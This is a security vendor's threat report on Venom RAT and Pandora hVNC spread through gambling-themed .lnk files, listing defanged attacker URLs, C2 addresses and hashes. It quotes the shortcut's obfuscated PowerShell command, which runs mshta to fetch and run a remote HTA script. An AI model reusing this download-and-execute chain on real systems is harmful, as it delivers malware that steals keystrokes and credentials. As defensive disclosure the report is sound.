Distribution of RAT Malware Disguised as a Gambling-related File
AhnLab SEcurity intelligence Center (ASEC) has identified the distribution of RAT malware disguised as an illegal gambling-related file. Like the distribution method of VenomRAT introduced last month ([1]), the malware is spread via a shortcut (.lnk) file, and it downloads the RAT directly from HTA. 
Figure 1. Operation process The distributed shortcut file contains a malicious PowerShell command which runs mshta and downloads the malicious script.
- PowerShell command C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W*\S*2\m*h?a.* ‘hxxp://193.***.***[.]253:7287/2.hta.hta’
- Figure 2. LNK properties
The malicious URLs in the confirmed shortcut file are as follows:
- hxxp://193.***.***[.]253:7287/2.hta.hta
- hxxp://193.***.***[.]253:7287/.hta
- hxxp://85.209.176[.]158:7287/6.hta
hxxp://193.***.***[.]253:7287/2.hta.hta contains VBS codes as it has in the past. Inside the VBS code, there are obfuscated legitimate document files and PowerShell commands that download the malicious RAT. The decoded PowerShell command is shown below.
Figure 3. Decoded PowerShell command When the command shown in Figure 3 is executed, Excel file is downloaded from hxxp://193.***.***[.]253:7287/percent.xlsm, and saved as percent.xlsm inside the %APPDATA% folder. The downloaded Excel file (percent.xlsm) contains betting methods shown in Figure 4, hinting that the threat actor is targeting users interested in gambling.
Figure 4. Content within percent.xlsm Afterward, the command downloads an additional executable from hxxp://193.***.***[.]253:7287/darkss.exe and saves it as darkss.exe inside the %APPDATA% folder. The downloaded executable is Venom RAT malware, which not only leaks keylogging and user credentials, but also performs various malicious activities by receiving commands from the threat actor.
Figure 5. Part of darkss.exe (Venom RAT) code
- C2 : 193.***.***[.]253:4449
Inside the previously mentioned URL (193.***.***[.]253:7287, 85.209.176[.]158:7287), other various malicious files exist in addition to those already mentioned in this post, such as HTA scripts, decoy document files, and malicious executables.
Figure 6. List of additional files found in the malicious URL The additional decoy document files that have been found also contained information about gambling websites as well as personal information of some users.
Figure 7. Additional decoy document file 1 (2023_12.xlsx)
Figure 8. Additional decoy document file 2 (testDB.xlsx) Darksoft111.exe and Pandora_cryptered.exe shown in Figure 6 are respectively Venom RAT and Pandora hVNC malware. Users are advised to take extra caution as the threat actor is using various types of RAT malware.
Figure 9. Part of Pandora_cryptered.exe (Pandora hVNC) code [File Detection] Downloader/LNK.Generic.S2541(2024.01.25.02) Downloader/HTA.Agent (2024.01.29.03) Trojan/Win.PWSX-gen (2024.01.12.03) Trojan/Win.Krypt (2024.01.29.03) [Behavior Detection] Execution/MDP.Powershell.M2514
MD5 04dc064b9e6fbc1466f5844c2dd422a40bb437212ee1af602f7a34670825ff4315e98eb4a6fd73ff10cac751d467375e20a88382040e47209e50652599d9244097e5b88cf1a452393c790ff84f08e3beURL http[:]//85[.]209[.]176[.]158[:]1337/http[:]//85[.]209[.]176[.]158[:]4449/http[:]//85[.]209[.]176[.]158[:]7287/Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.
